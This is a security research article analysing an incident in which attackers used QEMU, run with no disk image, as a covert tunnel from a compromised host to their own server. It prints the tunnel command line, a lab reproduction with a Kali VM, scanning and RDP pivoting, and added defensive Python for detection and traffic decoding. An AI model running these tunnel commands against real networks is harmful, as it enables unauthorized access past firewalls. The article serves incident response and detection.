Source: https://securelist.com/network-tunneling-with-qemu/111803/
# Network tunneling with... QEMU?

Research, 05 Mar 2024

Authors: Grigory Sablin, Alexander Rodchenko, Kirill Magaskin

Cyberattackers tend to give preference to legitimate tools when taking various attack steps, as these help them evade detection systems while keeping malware development costs to a minimum. Network scanning, capturing a process memory dump, exfiltrating data, running files remotely, and even encrypting drives can all be done with trusted software. To gain a foothold inside a compromised infrastructure and advance the attack, adversaries can use previously installed malware or connect to the network alongside employees through the company's RDP servers or corporate VPN (to do this, attackers must have accounts with appropriate privileges).

Another way to connect to the internal network of an attacked organization is to use utilities that set up network tunnels or forward network ports between corporate systems and the adversary's servers, which lets the attackers bypass NAT and firewalls to reach internal systems. It is that category of software that we would like to discuss here.

## Statistics

There is currently no shortage of utilities that can be used to set up a network tunnel between two systems. Some connect directly, while others go through a proxy, which hides the IP address of the attackers' server. The following are the utilities we have come across while responding to cyber incidents in the last three years.

* Stowaway
* ligolo
* 3proxy
* dog-tunnel
* chisel
* FRP
* ngrok
* gs-netcat
* plink
* iox
* nps

The most frequently used ones were ngrok and FRP.
Utilities of this type accounted for 10% of total attacks.

## QEMU as a tunneling tool

While investigating an incident at a large company a few months ago, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the following:

* The Angry IP Scanner network scanning utility
* mimikatz, the password, hash and Kerberos ticket extractor and Active Directory attack tool
* The QEMU hardware emulator

The first two were self-explanatory, but QEMU raised a few questions. What use would the malicious actors have for a virtualizer? We were able to retrieve the QEMU execution command line from the memory of the compromised machine. We found that it was started without a LiveCD or disk image, which is very unusual for QEMU. These were the arguments that the adversary used to run QEMU:

```
qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=<IP>:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic
```

where `<IP>` was an external IP address. Let us take a closer look at these arguments.

* `-m 1M`: Specifies the RAM size to allocate to the virtual machine. This was 1 MB in this case, utterly insufficient for most operating systems.
* `-netdev user,id=lan,restrict=off`: Creates a virtual network interface named `lan` of type `user`, which allows the virtual machine to communicate with the outside world through the host network stack. The `restrict=off` option removes restrictions on inbound and outbound connections.
* `-netdev socket,id=sock,connect=<IP>:443`: Creates a socket-type network interface named `sock`, which connects to a remote server at the specified IP address on port 443.
* `-netdev hubport,id=port-lan,hubid=0,netdev=lan`: Adds a port to the virtual hub with `hubid=0`, linked to the virtual network interface `lan`.
* `-netdev hubport,id=port-sock,hubid=0,netdev=sock`: Similarly, adds one more port to the same virtual hub, linked to the virtual network interface `sock`.
* `-nographic`: Starts QEMU in non-GUI mode with console output.

The IP address in the arguments grabbed our attention immediately: it was external and completely unrelated to the attacked company, so we consulted the QEMU documentation. We found that QEMU supports connections between virtual machines: the `-netdev` option creates network devices (backends) that can then be connected to virtual machines. Each of the numerous network devices is defined by its type and supports extra options. Below is a description of the `-netdev` types that were used.

### user (user network stack)

This is the simplest way of connecting a virtual machine to a network. Traffic passes through the host network stack, and the virtual machine connects to the network as if it were a regular application on the host machine.

```
qemu-system-x86_64 -netdev user,id=mynet0 -device e1000,netdev=mynet0
```

Here, `mynet0` is the network backend ID, and `e1000` is the network adapter (frontend) inside the virtual machine.

### hubport (virtual hub)

Connects several network devices, similarly to a physical network hub.

### socket

This connects virtual machines directly through network sockets, to create VM network topologies or to link VMs running on different hosts.

```
# VM1
qemu-system-x86_64 -netdev socket,id=mynet3,listen=:1234 -device e1000,netdev=mynet3

# VM2, connected to VM1
qemu-system-x86_64 -netdev socket,id=mynet4,connect=127.0.0.1:1234 -device e1000,netdev=mynet4
```

VM1 listens on port 1234, while VM2 connects to that port. This was the route the attackers took: they launched a "client" in the compromised system and had it connect to their server, opening access to the corporate network in which the "client" was running.
It had next to no effect on the performance of the compromised system, as the adversary was using neither a disk image nor a LiveCD when running QEMU.

We had no way of reliably determining how the attackers ran QEMU on their own server, so we decided to test the technique described above on a test bed consisting of three systems:

* InternalHost was located inside the network, with no internet access, and ran an RDP server on port 3389. It simulated an isolated system without access to the internet.
* PivotHost was located inside the network but had internet access. It simulated the system that had been breached by the attackers and used to reach InternalHost.
* AttackerServer was hosted in the cloud and simulated the adversary's server.

Our aim was to reach InternalHost from AttackerServer. The image below shows the general layout of the tunnel.

[Figure: Network tunnel diagram]

We used QEMU on AttackerServer to spin up a VM from a Kali Linux LiveCD. A socket-type network device was attached to the VM as a network adapter and listened on port 443.

```
qemu-system-x86_64 -boot d -cdrom kali-linux-2023.3-live-amd64.iso -m 6048 -device e1000,netdev=n1,mac=52:54:00:12:34:56 -smp 2 -netdev socket,id=n1,listen=:443
```

Another copy of QEMU was running on PivotHost, connecting through the socket network device to port 443 on AttackerServer in the cloud. We also attached a user-type network device, combined with the socket device through a hub. The QEMU startup options we used were similar to those previously used by the adversary.

```
qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=<IP>:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic
```

Once started, QEMU set up a network tunnel from PivotHost to AttackerServer, or more precisely, to the Kali Linux VM.
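Both PivotHost-side command lines above share a shape that a defender can look for in process-creation telemetry. The following triage script is an added example, not code from the original post: it assumes the QEMU command line has already been collected (for instance from an EDR or Sysmon process-creation event) and flags the combination of an outbound `socket` netdev, a `user` netdev bridged to it through `hubport`, no bootable image, and a tiny `-m` value. The sample command lines, including the 203.0.113.10 placeholder address standing in for the redacted one, are constructed.

```python
import ipaddress
import shlex

# Constructed sample: the PivotHost command line from the post, with the
# redacted external address replaced by a placeholder (203.0.113.10).
INCIDENT_CMDLINE = (
    "qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off "
    "-netdev socket,id=sock,connect=203.0.113.10:443 "
    "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
    "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic"
)
# Constructed benign sample: a local VM-to-VM socket link booting an ISO.
BENIGN_CMDLINE = ("qemu-system-x86_64 -m 2048 -cdrom kali.iso -device e1000,netdev=mynet4 "
                  "-netdev socket,id=mynet4,connect=127.0.0.1:1234")

# A guest booted from any of these is a "real" VM; the incident had none.
DISK_FLAGS = {"-hda", "-hdb", "-cdrom", "-drive", "-kernel", "-blockdev"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def parse_netdevs(argv):
    """Return [(type, {option: value})] for every -netdev on the command line."""
    netdevs = []
    for i, tok in enumerate(argv[:-1]):
        if tok == "-netdev":
            kind, _, rest = argv[i + 1].partition(",")
            opts = dict(kv.partition("=")[::2] for kv in rest.split(",") if kv)
            netdevs.append((kind, opts))
    return netdevs

def is_external(hostport):
    """True when a connect=host:port target is outside private/local ranges."""
    host = hostport.rsplit(":", 1)[0]
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return bool(host)  # a bare DNS name is unverifiable: treat as external
    return not any(ip in net for net in INTERNAL_NETS)

def assess(cmdline):
    """Score a QEMU command line against the tunneling pattern from the post."""
    argv = shlex.split(cmdline)
    netdevs = parse_netdevs(argv)
    findings = []
    socket_ids = {o.get("id") for k, o in netdevs
                  if k == "socket" and is_external(o.get("connect", ""))}
    if socket_ids:
        findings.append("socket netdev connects out to an external host")
    user_ids = {o.get("id") for k, o in netdevs if k == "user"}
    hub_members = {o.get("netdev") for k, o in netdevs if k == "hubport"}
    if socket_ids & hub_members and user_ids & hub_members:
        findings.append("user (host stack) and socket netdevs bridged on one hub")
    if not any(a in DISK_FLAGS for a in argv):
        findings.append("no disk image, kernel or LiveCD: nothing to boot")
    if "-m" in argv:  # QEMU -m takes plain MB or a size with an M/G suffix
        val = argv[argv.index("-m") + 1].upper()
        mem = int(val[:-1]) * 1024 if val.endswith("G") else int(val.rstrip("M"))
        if mem < 64:
            findings.append(f"only {mem} MB of RAM: too little for any guest OS")
    return {"suspicious": len(findings) >= 2, "findings": findings}
```

Any single finding on its own is weak evidence, so the script only reports a command line as suspicious when two or more coincide; a legitimate VM-to-VM socket link such as the VM1/VM2 example above produces none.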
Kali Linux could scan the subnet to which PivotHost was connected for other systems.

[Figure: Subnet scan output]

The scan located InternalHost, with the IP address 192.168.56.109. The Nmap utility showed that port 3389 was open. We tried connecting to InternalHost using RDP.

[Figure: Successful RDP connection to InternalHost]

Thus, we were able to ascertain that this technique for achieving network access was indeed effective. In addition to the aforementioned types of network devices, QEMU supports several others, which can also be employed by malicious actors.

## QEMU network traffic analysis

QEMU does not apply any extra encryption when tunneling traffic. It transmits encapsulated packets unencrypted: the application-level payload sent to the server contains the size of the encapsulated Ethernet frame (4 bytes, outlined in yellow in the image below), followed by the Ethernet frame itself (outlined in red).

[Figure: Example of an encapsulated Ethernet frame]

The size of the encapsulated Ethernet frame in the image above is 89 (0x59) bytes. That value is immediately followed by the encapsulated Ethernet frame. With a traffic dump captured on PivotHost, we could obtain the encapsulated traffic by removing the first 58 bytes of each packet (for TCP: 14 bytes of Ethernet + 20 bytes of IP + 20 bytes of TCP headers + 4 bytes for the inner frame size). This can be done with the editcap utility from the Wireshark package, after first removing from the PCAP file all packets that contain no encapsulated traffic.

```
editcap.exe -L -C 58 original.pcap extracted_traffic.pcap
```

The result was a PCAP file containing the traffic that had been sent through the tunnel.
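The length-prefix framing described above is simple enough to decode directly. The following decoder is an added example, not code from the original post or from QEMU: it assumes you are working on the reassembled TCP payload of the tunnel connection (for example, the raw bytes saved from Wireshark's Follow TCP Stream) rather than on individual packets, and the sample frames and segments it processes are constructed.

```python
import struct

ETH_HDR = struct.Struct("!6s6sH")  # destination MAC, source MAC, EtherType

def encapsulate(frame):
    """Wrap an Ethernet frame the way QEMU's socket netdev sends it over TCP:
    a 4-byte big-endian length (QEMU uses htonl) followed by the raw frame."""
    return struct.pack("!I", len(frame)) + frame

def decode_stream(segment, pending=b""):
    """Split TCP payload bytes into complete Ethernet frames.
    Returns (frames, leftover); leftover is an incomplete trailing record that
    must be passed back as 'pending' with the next segment, so a frame that
    straddles two TCP segments is reassembled instead of being lost."""
    buf = pending + segment
    frames, off = [], 0
    while off + 4 <= len(buf):
        (length,) = struct.unpack_from("!I", buf, off)
        if length < 14 or length > 65535:
            raise ValueError(f"implausible frame length {length} at offset {off}")
        if off + 4 + length > len(buf):
            break  # the rest of this frame arrives in the next segment
        frames.append(buf[off + 4:off + 4 + length])
        off += 4 + length
    return frames, buf[off:]

def ethernet_header(frame):
    """Parse the 14-byte Ethernet header of a de-encapsulated frame."""
    def mac(raw):
        return ":".join(f"{b:02x}" for b in raw)
    dst, src, ethertype = ETH_HDR.unpack_from(frame)
    return {"dst": mac(dst), "src": mac(src), "ethertype": ethertype}

def extract_all(segments):
    """Run successive TCP segments through decode_stream, carrying leftovers."""
    frames, pending = [], b""
    for seg in segments:
        got, pending = decode_stream(seg, pending)
        frames.extend(got)
    if pending:
        raise ValueError(f"{len(pending)} trailing bytes never completed a frame")
    return frames

# Constructed sample tunnel payload: an 89-byte IPv4 frame (the size seen in the
# post's capture) followed by a 60-byte ARP broadcast, cut into two TCP segments
# at byte 100 so that the second frame is split across the boundary.
VM_MAC = bytes.fromhex("525400123456")  # the MAC from the post's Kali VM command line
PEER_MAC = bytes.fromhex("0a0b0c0d0e0f")  # constructed
FRAME_IPV4 = ETH_HDR.pack(PEER_MAC, VM_MAC, 0x0800) + b"\x45" + b"\x00" * 74
FRAME_ARP = ETH_HDR.pack(b"\xff" * 6, VM_MAC, 0x0806) + b"\x00" * 46
TUNNEL_STREAM = encapsulate(FRAME_IPV4) + encapsulate(FRAME_ARP)
SEGMENTS = [TUNNEL_STREAM[:100], TUNNEL_STREAM[100:]]

if __name__ == "__main__":
    for f in extract_all(SEGMENTS):
        print(len(f), ethernet_header(f))
```

Unlike the `editcap -C 58` approach, which assumes exactly one frame per packet and option-free IP and TCP headers, this works on the byte stream and so also copes with several frames in one segment and with frames split across segments.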
[Figure: Original packet transmitted through the tunnel]

## Conclusion

Malicious actors using legitimate tools to perform various attack steps is nothing new to incident response professionals. Yet we have to admit that attackers sometimes come up with ingenious applications for unlikely software, as was the case with QEMU. This further supports the concept of multi-level protection, covering both reliable endpoint protection and specialized solutions for detecting and protecting against complex and targeted attacks, including human-operated ones. Only comprehensive security that includes 24/7 network (NDR, NGFW) and endpoint (EDR, EPP) monitoring, for instance by SOC experts, can detect anomalies in a timely manner and block an attack at its initial stage. Our MDR service is already capable of detecting the kind of suspicious QEMU activity in question, and appropriate IDS rules have been added to the KATA platform with the verdict Backdoor.Agent.QEMU.C&C.